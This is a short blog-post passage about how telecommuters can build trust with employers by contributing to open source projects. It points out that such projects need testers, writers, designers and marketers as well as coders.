Her article was well done (not just because she interviewed me), but it makes me think about a larger issue for telecommuters.  Getting hired for a job as a teleworkers means building trust ahead of time.  If you&#8217;re in the high-tech industry then open source is a really incredible way to build your reputation.  <\/p>\n<p>Many people shy away from open source because they don&#8217;t write code, but open source projects need testers, writers, organizers, designers, and marketers too.
